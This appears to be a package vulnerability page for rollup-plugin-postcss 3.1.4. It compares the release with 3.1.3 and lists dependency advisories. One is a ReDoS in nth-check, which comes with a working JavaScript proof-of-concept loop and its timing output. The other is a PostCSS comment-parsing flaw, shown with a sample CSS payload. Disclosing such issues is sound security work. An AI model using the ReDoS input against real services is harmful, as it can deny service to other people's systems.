Rollup-plugin-postcss is a valuable tool for developers seeking seamless integration between Rollup and PostCSS. Comparing version 3.1.4 with the previous stable version 3.1.3, we observe nuanced changes that can impact a developer's workflow. Both versions share core dependencies such as chalk, cssnano, postcss, and rollup-pluginutils, ensuring consistent functionality for common PostCSS transformations. The development dependencies also remain largely consistent, suggesting a focus on maintaining existing testing and building processes.
However, a key difference lies in the package distribution. Version 3.1.4 comes with fileCount: 5 and an unpackedSize of 39920 bytes, while version 3.1.3 had fileCount: 4 with unpackedSize of 38689 bytes. These differences, though small, can suggest the addition of a new file or modifications to existing ones, potentially addressing bug fixes, performance improvements, or feature enhancements. For developers, this means potentially improved stability or new capabilities warranting a closer look at the changelog. Furthermore, version 3.1.4 was released on "2020-08-05T11:51:52.329Z" in contrast to the "2020-07-14T17:54:32.208Z" release date of version 3.1.3, giving a sense of how recent the improvements are. Users should investigate the changes between these versions to determine if the updates address specific needs or resolve encountered issues.
All the vulnerabilities related to the version 3.1.4 of the package
Inefficient Regular Expression Complexity in nth-check
There is a Regular Expression Denial of Service (ReDoS) vulnerability in nth-check that causes a denial of service when parsing crafted invalid CSS nth-checks.
The ReDoS vulnerabilities of the regex are mainly due to the sub-pattern \s*(?:([+-]?)\s*(\d+))? with quantified overlapping adjacency and can be exploited with the following code.
Proof of Concept
// PoC.js
var nthCheck = require("nth-check")
for(var i = 1; i <= 50000; i++) {
var time = Date.now();
var attack_str = '2n' + ' '.repeat(i*10000)+"!";
try {
nthCheck.parse(attack_str)
}
catch(err) {
var time_cost = Date.now() - time;
console.log("attack_str.length: " + attack_str.length + ": " + time_cost+" ms")
}
}
The Output
attack_str.length: 10003: 174 ms
attack_str.length: 20003: 1427 ms
attack_str.length: 30003: 2602 ms
attack_str.length: 40003: 4378 ms
attack_str.length: 50003: 7473 ms
PostCSS line return parsing error
An issue was discovered in PostCSS before 8.4.31. It affects linters using PostCSS to parse external Cascading Style Sheets (CSS). There may be \r discrepancies, as demonstrated by @font-face{ font:(\r/*);} in a rule.
This vulnerability affects linters using PostCSS to parse external untrusted CSS. An attacker can prepare CSS in such a way that it will contains parts parsed by PostCSS as a CSS comment. After processing by PostCSS, it will be included in the PostCSS output in CSS nodes (rules, properties) despite being originally included in a comment.